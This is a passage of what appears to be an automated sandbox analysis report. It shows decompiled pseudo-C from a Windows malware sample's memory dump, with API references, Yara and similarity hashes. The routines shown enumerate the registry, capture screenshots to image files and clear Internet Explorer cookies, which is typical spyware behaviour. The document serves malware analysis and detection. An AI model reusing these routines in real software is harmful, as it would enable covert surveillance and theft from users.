                                                                                                					return 1;
                                                                                                				} else {
                                                                                                					_t127 = 0;
                                                                                                					_v12 = 0;
                                                                                                					_t133 = 0x46c178;
                                                                                                					L21:
                                                                                                					_t64 =  *(_t100 + 0x80);
                                                                                                					if(_t64 != 0) {
                                                                                                						asm("lock dec dword [eax]");
                                                                                                					}
                                                                                                					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
                                                                                                						asm("lock xadd [ecx], eax");
                                                                                                						if((_t64 | 0xffffffff) == 0) {
                                                                                                							E004414D5( *((intOrPtr*)(_t100 + 0x7c)));
                                                                                                							E004414D5( *(_t100 + 0x88));
                                                                                                						}
                                                                                                					}
                                                                                                					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
                                                                                                					 *(_t100 + 0x80) = _t127;
                                                                                                					 *(_t100 + 0x88) = _t133;
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}




































                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: 180ba7e6f5cf43c85908710e591c51e3653f9aa27e3417c63d91bce0d77fd7b2
                                                                                                • Instruction ID: 20c19765705e43f805e4d3dfcc6a85be5153841542d2b35ed8081d8b16cea321
                                                                                                • Opcode Fuzzy Hash: 180ba7e6f5cf43c85908710e591c51e3653f9aa27e3417c63d91bce0d77fd7b2
                                                                                                • Instruction Fuzzy Hash: 7D61F371940205AFEB20DF69C882BAEBBF4EF45720F14416BE944EB381EB349D419B59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 88%
                                                                                                			E00410DBD(void* __ecx) {
                                                                                                				int _v8;
                                                                                                				int _v12;
                                                                                                				int _v16;
                                                                                                				int _v20;
                                                                                                				int _v24;
                                                                                                				int _v28;
                                                                                                				int _v32;
                                                                                                				char _v56;
                                                                                                				int _v60;
                                                                                                				int _v64;
                                                                                                				int _v68;
                                                                                                				int _v72;
                                                                                                				int _v76;
                                                                                                				struct _FILETIME _v84;
                                                                                                				char _v95;
                                                                                                				char _v96;
                                                                                                				char _v108;
                                                                                                				char _v132;
                                                                                                				char _v156;
                                                                                                				short _v668;
                                                                                                				short _v1188;
                                                                                                				char _v11188;
                                                                                                				short _v43956;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				int _t72;
                                                                                                				long _t73;
                                                                                                				void* _t93;
                                                                                                				long _t103;
                                                                                                				void* _t110;
                                                                                                				void* _t141;
                                                                                                				int _t145;
                                                                                                				int _t147;
                                                                                                				void* _t148;
                                                                                                				void* _t149;
                                                                                                
                                                                                                				_t112 = __ecx;
                                                                                                				E00451ED0();
                                                                                                				_push(_t141);
                                                                                                				_t145 = 0;
                                                                                                				_t110 = __ecx;
                                                                                                				E00432D80(_t141,  &_v1188, 0, 0x208);
                                                                                                				_t149 = _t148 + 0xc;
                                                                                                				_v24 = 0x104;
                                                                                                				_v8 = 0;
                                                                                                				_v12 = 0x3fff;
                                                                                                				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
                                                                                                				_t72 = _v8;
                                                                                                				if(_t72 != 0 && _t72 != 0) {
                                                                                                					do {
                                                                                                						_v28 = 0xff;
                                                                                                						_t103 = RegEnumKeyExW(_t110, _t145,  &_v668,  &_v28, 0, 0, 0,  &_v84);
                                                                                                						_t152 = _t103;
                                                                                                						if(_t103 == 0) {
                                                                                                							E00403303(E004043E6(_t110,  &_v108,  &_v668, _t152, E00404260(_t110,  &_v56, "\n")));
                                                                                                							E00401EE2();
                                                                                                							_t112 =  &_v56;
                                                                                                							E00401EE2();
                                                                                                						}
                                                                                                						_t145 = _t145 + 1;
                                                                                                					} while (_t145 < _v8);
                                                                                                				}
                                                                                                				_t73 = _v20;
                                                                                                				if(_t73 != 0) {
                                                                                                					_t147 = 0;
                                                                                                					if(_t73 != 0) {
                                                                                                						do {
                                                                                                							_v96 = 0;
                                                                                                							_v16 = 0x2710;
                                                                                                							asm("stosd");
                                                                                                							_v12 = 0x3fff;
                                                                                                							asm("stosd");
                                                                                                							asm("stosw");
                                                                                                							asm("stosb");
                                                                                                							_v43956 = 0;
                                                                                                							_t73 = RegEnumValueW(_t110, _t147,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
                                                                                                							_t156 = _t73;
                                                                                                							if(_t73 == 0) {
                                                                                                								E0043CDA6(_t112, _v32,  &_v96, 0xa);
                                                                                                								_t149 = _t149 + 0xc;
                                                                                                								E00403303(E004043E6(_t110,  &_v56,  &_v43956, _t156, E00404260(_t110,  &_v132, "\n")));
                                                                                                								E00401EE2();
                                                                                                								E00401EE2();
                                                                                                								E00403428(E004053F2(_t110,  &_v132,  &_v96,  &_v95, _t156, E00402076(_t110,  &_v56, "\n")));
                                                                                                								E00401FB9();
                                                                                                								E00401FB9();
                                                                                                								_t93 = E00402076(_t110,  &_v156, "[regsplt]");
                                                                                                								E00403428(E00402F0F( &_v132, E0040209D(_t110,  &_v56,  &_v96, _t156,  &_v11188, _v16), _t93));
                                                                                                								E00401FB9();
                                                                                                								E00401FB9();
                                                                                                								_t112 =  &_v156;
                                                                                                								_t73 = E00401FB9();
                                                                                                							}
                                                                                                							_t147 = _t147 + 1;
                                                                                                						} while (_t147 < _v20);
                                                                                                					}
                                                                                                				}
                                                                                                				return _t73;
                                                                                                			}


                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Enum$InfoQueryValue
                                                                                                • String ID: 0F$[regsplt]$hF
                                                                                                • API String ID: 3554306468-2958734333
                                                                                                • Opcode ID: e72c293795b439eed9824ebecc37ed77d6920adeb23597d1b9d2b25e0ba63e2b
                                                                                                • Instruction ID: ff46a6b3d7d9da94fbd09377df838802b0ffc9c910e1f7f70bb484437d037f56
                                                                                                • Opcode Fuzzy Hash: e72c293795b439eed9824ebecc37ed77d6920adeb23597d1b9d2b25e0ba63e2b
                                                                                                • Instruction Fuzzy Hash: A1513071900219AADB11EBD5DC81EEFB77CEF04304F50017AF605B2191EFB4AA49CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 73%
                                                                                                			E00444F7B(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                                                				signed int _v8;
                                                                                                				signed char _v15;
                                                                                                				char _v16;
                                                                                                				void _v24;
                                                                                                				short _v28;
                                                                                                				char _v31;
                                                                                                				void _v32;
                                                                                                				long _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				void* _v44;
                                                                                                				signed int _v48;
                                                                                                				signed char* _v52;
                                                                                                				long _v56;
                                                                                                				int _v60;
                                                                                                				signed int _t78;
                                                                                                				signed int _t80;
                                                                                                				int _t86;
                                                                                                				void* _t94;
                                                                                                				long _t97;
                                                                                                				void _t105;
                                                                                                				void* _t112;
                                                                                                				signed int _t116;
                                                                                                				signed int _t118;
                                                                                                				signed char _t123;
                                                                                                				signed char _t128;
                                                                                                				intOrPtr _t129;
                                                                                                				signed int _t131;
                                                                                                				signed char* _t133;
                                                                                                				intOrPtr* _t135;
                                                                                                				signed int _t136;
                                                                                                				void* _t137;
                                                                                                
                                                                                                				_t78 =  *0x46c00c; // 0x4cc22724
                                                                                                				_v8 = _t78 ^ _t136;
                                                                                                				_t80 = _a8;
                                                                                                				_t118 = _t80 >> 6;
                                                                                                				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                                                                				_t133 = _a12;
                                                                                                				_v52 = _t133;
                                                                                                				_v48 = _t118;
                                                                                                				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46d800 + _t118 * 4)) + _t116 + 0x18));
                                                                                                				_v40 = _a16 + _t133;
                                                                                                				_t86 = GetConsoleCP();
                                                                                                				_t135 = _a4;
                                                                                                				_v60 = _t86;
                                                                                                				 *_t135 = 0;
                                                                                                				 *((intOrPtr*)(_t135 + 4)) = 0;
                                                                                                				 *((intOrPtr*)(_t135 + 8)) = 0;
                                                                                                				while(_t133 < _v40) {
                                                                                                					_v28 = 0;
                                                                                                					_v31 =  *_t133;
                                                                                                					_t129 =  *((intOrPtr*)(0x46d800 + _v48 * 4));
                                                                                                					_t123 =  *(_t129 + _t116 + 0x2d);
                                                                                                					if((_t123 & 0x00000004) == 0) {
                                                                                                						if(( *(E00440685(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                                                							_push(1);
                                                                                                							_push(_t133);
                                                                                                							goto L8;
                                                                                                						} else {
                                                                                                							if(_t133 >= _v40) {
                                                                                                								_t131 = _v48;
                                                                                                								 *((char*)( *((intOrPtr*)(0x46d800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                                                                								 *( *((intOrPtr*)(0x46d800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x46d800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                                                                								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                							} else {
                                                                                                								_t112 = E00446255( &_v28, _t133, 2);
                                                                                                								_t137 = _t137 + 0xc;
                                                                                                								if(_t112 != 0xffffffff) {
                                                                                                									_t133 =  &(_t133[1]);
                                                                                                									goto L9;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t128 = _t123 & 0x000000fb;
                                                                                                						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                                                                						_push(2);
                                                                                                						_v15 = _t128;
                                                                                                						 *(_t129 + _t116 + 0x2d) = _t128;
                                                                                                						_push( &_v16);
                                                                                                						L8:
                                                                                                						_push( &_v28);
                                                                                                						_t94 = E00446255();
                                                                                                						_t137 = _t137 + 0xc;
                                                                                                						if(_t94 != 0xffffffff) {
                                                                                                							L9:
                                                                                                							_t133 =  &(_t133[1]);
                                                                                                							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                                                							_v56 = _t97;
                                                                                                							if(_t97 != 0) {
                                                                                                								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                                                                									L19:
                                                                                                									 *_t135 = GetLastError();
                                                                                                								} else {
                                                                                                									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                                                                                									if(_v36 >= _v56) {
                                                                                                										if(_v31 != 0xa) {
                                                                                                											goto L16;
                                                                                                										} else {
                                                                                                											_t105 = 0xd;
                                                                                                											_v32 = _t105;
                                                                                                											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                                                												goto L19;
                                                                                                											} else {
                                                                                                												if(_v36 >= 1) {
                                                                                                													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                                                                                													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                													goto L16;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					goto L20;
                                                                                                					L16:
                                                                                                				}
                                                                                                				L20:
                                                                                                				return E00430A5B(_v8 ^ _t136);
                                                                                                			}



































                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,004456F0,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00444FBD
                                                                                                • __fassign.LIBCMT ref: 00445038
                                                                                                • __fassign.LIBCMT ref: 00445053
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00445079
                                                                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,004456F0,00000000,?,?,?,?,?,?,?,?,?,004456F0,?), ref: 00445098
                                                                                                • WriteFile.KERNEL32(?,?,00000001,004456F0,00000000,?,?,?,?,?,?,?,?,?,004456F0,?), ref: 004450D1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1324828854-0
                                                                                                • Opcode ID: 127fb5347497e2ddee00f9833cb74db7520f615ed6b24a94c7aec983a16e2d71
                                                                                                • Instruction ID: 01bd3782909f5761c5b99469dd3eab84a6b1eb9c60e0772c8d9a3534b9d430ac
                                                                                                • Opcode Fuzzy Hash: 127fb5347497e2ddee00f9833cb74db7520f615ed6b24a94c7aec983a16e2d71
                                                                                                • Instruction Fuzzy Hash: 2A51D270E006099FDF10DFA8D885AEEBBB4EF09301F14416AE551E7252E6349941CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E00416141(void* __ecx, void* __edx, void* __eflags) {
                                                                                                				char _v1048;
                                                                                                				char _v1056;
                                                                                                				char _v1092;
                                                                                                				void* _v1096;
                                                                                                				char _v1112;
                                                                                                				char _v1120;
                                                                                                				void* _v1124;
                                                                                                				void* _v1136;
                                                                                                				char _v1144;
                                                                                                				char _v1152;
                                                                                                				char _v1156;
                                                                                                				void* _v1160;
                                                                                                				char _v1184;
                                                                                                				char _v1200;
                                                                                                				void* _v1204;
                                                                                                				char _v1224;
                                                                                                				char _v1232;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __ebp;
                                                                                                				intOrPtr* _t39;
                                                                                                				void* _t54;
                                                                                                				void* _t57;
                                                                                                				void* _t60;
                                                                                                				void* _t67;
                                                                                                				void* _t73;
                                                                                                				char* _t84;
                                                                                                				char* _t86;
                                                                                                				void* _t120;
                                                                                                				void* _t121;
                                                                                                				void* _t123;
                                                                                                				intOrPtr* _t124;
                                                                                                				signed int _t128;
                                                                                                				void* _t130;
                                                                                                
                                                                                                				_t133 = __eflags;
                                                                                                				_t130 = (_t128 & 0xfffffff8) - 0x4b4;
                                                                                                				_t121 = __ecx;
                                                                                                				_t74 = __edx;
                                                                                                				E00403098(__edx,  &_v1184, E00404260(__edx,  &_v1156, __ecx), _t121, __eflags, L"png");
                                                                                                				E00401EE2();
                                                                                                				E004152EA( &_v1120, __edx, __eflags, 0);
                                                                                                				_t84 =  &_v1120;
                                                                                                				_t39 =  *0x46dd00(E00401F87(_t84), E0040247B(), _t120, _t123, _t73);
                                                                                                				_t124 = _t39;
                                                                                                				E00414E19( &_v1144, _t124);
                                                                                                				_t86 = L"image/png";
                                                                                                				E00415656(_t86,  &_v1112);
                                                                                                				E00414E91(E00401EDD( &_v1200),  &_v1152, _t43,  &_v1112);
                                                                                                				 *((intOrPtr*)( *_t124 + 8))(_t124, _t86, _t84);
                                                                                                				if( *((char*)(E00401F87(E00401E3B(0x46e3a4,  &_v1112, _t133, 0x1b)))) == 1) {
                                                                                                					E004020C7(__edx,  &_v1224);
                                                                                                					_t54 = E004183CC(E00401EDD( &_v1200),  &_v1224);
                                                                                                					_t135 = _t54;
                                                                                                					if(_t54 != 0) {
                                                                                                						DeleteFileW(E00401EDD( &_v1200));
                                                                                                						_t57 = E0040247B();
                                                                                                						E00405C28( &_v1048, E00401F87(0x46e5f0), _t57);
                                                                                                						_t60 = E0040247B();
                                                                                                						E00405D50(_t74,  &_v1056,  &_v1224,  &_v1184, E00401F87( &_v1232), _t60);
                                                                                                						E00403098(_t74,  &_v1120, E00404260(_t74,  &_v1092, _t121), _t121, _t135, L"dat");
                                                                                                						E00401EE2();
                                                                                                						_t67 = E00401EDD( &_v1120);
                                                                                                						E004020DE(_t74, _t130 - 0x18, _t64, _t135,  &_v1200);
                                                                                                						E0041843E(_t67);
                                                                                                						E00401EE2();
                                                                                                						E00401FB9();
                                                                                                					}
                                                                                                					_t48 = E00401FB9();
                                                                                                				}
                                                                                                				E00414E3F(_t48,  &_v1152);
                                                                                                				E00401FB9();
                                                                                                				return E00401EE2();
                                                                                                			}






































                                                                                                APIs
                                                                                                  • Part of subcall function 004152EA: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00415305
                                                                                                  • Part of subcall function 004152EA: CreateCompatibleDC.GDI32(00000000), ref: 00415311
                                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 0041619A
                                                                                                  • Part of subcall function 00414E19: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00414E2F
                                                                                                  • Part of subcall function 00414E91: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 00414EA2
                                                                                                  • Part of subcall function 004183CC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 004183E9
                                                                                                • DeleteFileW.KERNEL32(00000000,0000001B), ref: 0041622B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$File$GdipImageStream$CompatibleDeleteFromLoadSave
                                                                                                • String ID: dat$hpg$image/png$png
                                                                                                • API String ID: 1095564277-4149092116
                                                                                                • Opcode ID: d6de3cbe19330614d2590e2b05c0d8e87b147a405a3fce26f9038a85f6be0c6c
                                                                                                • Instruction ID: 56354a2dae210a11cf7bfeb46c419da43eb19165d20f7fa48ce425920fa30a2a
                                                                                                • Opcode Fuzzy Hash: d6de3cbe19330614d2590e2b05c0d8e87b147a405a3fce26f9038a85f6be0c6c
                                                                                                • Instruction Fuzzy Hash: E64131711043405AC314FB72D896DEFB3A8AF91348F40493FF586631E2EF789A49C69A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 75%
                                                                                                			E0040A43E(void* __eflags) {
                                                                                                				char _v28;
                                                                                                				char _v52;
                                                                                                				char _v76;
                                                                                                				char _v340;
                                                                                                				void* __ebx;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				void* _t17;
                                                                                                				void* _t20;
                                                                                                				int _t34;
                                                                                                				void* _t40;
                                                                                                				void* _t41;
                                                                                                				char* _t42;
                                                                                                				void* _t48;
                                                                                                				char* _t55;
                                                                                                				void* _t59;
                                                                                                				void* _t61;
                                                                                                				void* _t62;
                                                                                                
                                                                                                				_t42 =  &_v28;
                                                                                                				E004020C7(_t40, _t42);
                                                                                                				_push(_t42);
                                                                                                				_t41 = 0;
                                                                                                				_t17 = E00410911( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
                                                                                                				_t62 = _t61 + 0xc;
                                                                                                				E00401FC3( &_v28, 0x80000001, _t59, _t17);
                                                                                                				E00401FB9();
                                                                                                				_t58 = 0x460734;
                                                                                                				_t20 = E00405C1B(0x460734);
                                                                                                				_t66 = _t20;
                                                                                                				if(_t20 == 0) {
                                                                                                					ExpandEnvironmentStringsA(E00401F87( &_v28),  &_v340, 0x104);
                                                                                                					__eflags = PathFileExistsA( &_v340);
                                                                                                					if(__eflags == 0) {
                                                                                                						goto L1;
                                                                                                					} else {
                                                                                                						E00402076(0,  &_v52,  &_v340);
                                                                                                						_t58 =  &_v52;
                                                                                                						_t34 = E00418144(E00401EDD(E00417CCA( &_v76,  &_v52)));
                                                                                                						E00401EE2();
                                                                                                						_t55 =  &_v52;
                                                                                                						E00401FB9();
                                                                                                						__eflags = _t34;
                                                                                                						if(__eflags == 0) {
                                                                                                							_push(_t55);
                                                                                                							_push(_t55);
                                                                                                							__eflags = E0040A748();
                                                                                                							if(__eflags != 0) {
                                                                                                								_t41 = 1;
                                                                                                								E00402076(1, _t62 - 0x18, "\n[IE cookies cleared!]");
                                                                                                								E0040A724(1,  &_v52, __eflags);
                                                                                                								goto L8;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t48 = _t62 - 0x18;
                                                                                                							_push("\n[IE cookies cleared!]");
                                                                                                							goto L2;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					L1:
                                                                                                					_t48 = _t62 - 0x18;
                                                                                                					_push("\n[IE cookies not found]");
                                                                                                					L2:
                                                                                                					E00402076(_t41, _t48);
                                                                                                					E0040A724(_t41, _t58, _t66);
                                                                                                					_t41 = 1;
                                                                                                					L8:
                                                                                                				}
                                                                                                				E00401FB9();
                                                                                                				return _t41;
                                                                                                			}






















                                                                                                APIs
                                                                                                  • Part of subcall function 00410911: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00410933
                                                                                                  • Part of subcall function 00410911: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00410952
                                                                                                  • Part of subcall function 00410911: RegCloseKey.ADVAPI32(?), ref: 0041095B
                                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A4C0
                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0040A4CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                • API String ID: 1133728706-4073444585
                                                                                                • Opcode ID: f76f05ecf2ca6275e224ca6f73b952736a389c26319c30d3baf065610a948902
                                                                                                • Instruction ID: 9a7e97995817d627765e2276035d41f6b7085d8684995917a71da6fb3efd3936
                                                                                                • Opcode Fuzzy Hash: f76f05ecf2ca6275e224ca6f73b952736a389c26319c30d3baf065610a948902
                                                                                                • Instruction Fuzzy Hash: 2C219E71A5021966CB04F7A2CC5ADEE7368AF50308F40013FB902772D2EFBD9959C69A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 90%
                                                                                                			E0045136D(char* _a4, short* _a8) {
                                                                                                				int _v8;
                                                                                                				void* __ecx;
                                                                                                				void* __esi;
                                                                                                				short* _t10;
                                                                                                				short* _t14;
                                                                                                				int _t15;
                                                                                                				short* _t16;
                                                                                                				void* _t26;
                                                                                                				int _t27;
                                                                                                				void* _t29;
                                                                                                				short* _t35;
                                                                                                				short* _t39;
                                                                                                				short* _t40;
                                                                                                
                                                                                                				_push(_t29);
                                                                                                				if(_a4 != 0) {
                                                                                                					_t39 = _a8;
                                                                                                					__eflags = _t39;
                                                                                                					if(__eflags != 0) {
                                                                                                						_push(_t26);
                                                                                                						E00443334(_t29, _t39, __eflags);
                                                                                                						asm("sbb ebx, ebx");
                                                                                                						_t35 = 0;
                                                                                                						_t27 = _t26 + 1;
                                                                                                						 *_t39 = 0;
                                                                                                						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
                                                                                                						_v8 = _t10;
                                                                                                						__eflags = _t10;
                                                                                                						if(_t10 != 0) {
                                                                                                							_t40 = E00440C6C(_t29, _t10 + _t10);
                                                                                                							__eflags = _t40;
                                                                                                							if(_t40 != 0) {
                                                                                                								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
                                                                                                								__eflags = _t15;
                                                                                                								if(_t15 != 0) {
                                                                                                									_t16 = _t40;
                                                                                                									_t40 = 0;
                                                                                                									_t35 = 1;
                                                                                                									__eflags = 1;
                                                                                                									 *_a8 = _t16;
                                                                                                								} else {
                                                                                                									E004388FC(GetLastError());
                                                                                                								}
                                                                                                							}
                                                                                                							E004414D5(_t40);
                                                                                                							_t14 = _t35;
                                                                                                						} else {
                                                                                                							E004388FC(GetLastError());
                                                                                                							_t14 = 0;
                                                                                                						}
                                                                                                					} else {
                                                                                                						 *((intOrPtr*)(E00438932())) = 0x16;
                                                                                                						E00437709();
                                                                                                						_t14 = 0;
                                                                                                					}
                                                                                                					return _t14;
                                                                                                				}
                                                                                                				 *((intOrPtr*)(E00438932())) = 0x16;
                                                                                                				E00437709();
                                                                                                				return 0;
                                                                                                			}
















                                                                                                0x00000000
                                                                                                0x0045142f
                                                                                                0x0045137e
                                                                                                0x00451384
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 48723f8299538c5f45eee52e63c0ecab235c55e9929719d0ad3ede01aa6c63f6
                                                                                                • Instruction ID: 8b9e5de4d639c6005189855640ed023597854485a42c717030aa09de08397672
                                                                                                • Opcode Fuzzy Hash: 48723f8299538c5f45eee52e63c0ecab235c55e9929719d0ad3ede01aa6c63f6
                                                                                                • Instruction Fuzzy Hash: 07112771504225BFDB202FB79C04A6F7A6CEF86766F10526FFC11C7262DE3888418669
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 92%
                                                                                                			E0040E82F(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                				void* _v8;
                                                                                                				char _v12;
                                                                                                				char _v24;
                                                                                                				void* __esi;
                                                                                                				intOrPtr _t40;
                                                                                                				void* _t48;
                                                                                                				intOrPtr* _t51;
                                                                                                
                                                                                                				E00430DB5( &_v12, 0);
                                                                                                				_t48 =  *0x46fcd8;
                                                                                                				_v8 = _t48;
                                                                                                				_t51 = E0040BA47(_a4, E0040B970(0x46d130));
                                                                                                				if(_t51 != 0) {
                                                                                                					L5:
                                                                                                					E00430E0D( &_v12);
                                                                                                					return _t51;
                                                                                                				} else {
                                                                                                					if(_t48 == 0) {
                                                                                                						__eflags = E0040BB79(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E0040B836( &_v24);
                                                                                                							E00432EDA( &_v24, 0x46976c);
                                                                                                							asm("int3");
                                                                                                							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
                                                                                                							__eflags =  *0x46fccc -  *((intOrPtr*)(_t40 + 4));
                                                                                                							if( *0x46fccc >  *((intOrPtr*)(_t40 + 4))) {
                                                                                                								_push(_t51);
                                                                                                								E0042FE69(0x46fccc);
                                                                                                								__eflags =  *0x46fccc - 0xffffffff;
                                                                                                								if( *0x46fccc == 0xffffffff) {
                                                                                                									E0040EBE6();
                                                                                                									E004301F3(__eflags, 0x453a17);
                                                                                                									E0042FE2A(0x46fccc, 0x46fccc);
                                                                                                								}
                                                                                                							}
                                                                                                							return 0x46fcd0;
                                                                                                						} else {
                                                                                                							_t51 = _v8;
                                                                                                							 *0x46fcd8 = _t51;
                                                                                                							 *((intOrPtr*)( *_t51 + 4))();
                                                                                                							E00430FC6(__eflags, _t51);
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t51 = _t48;
                                                                                                						goto L5;
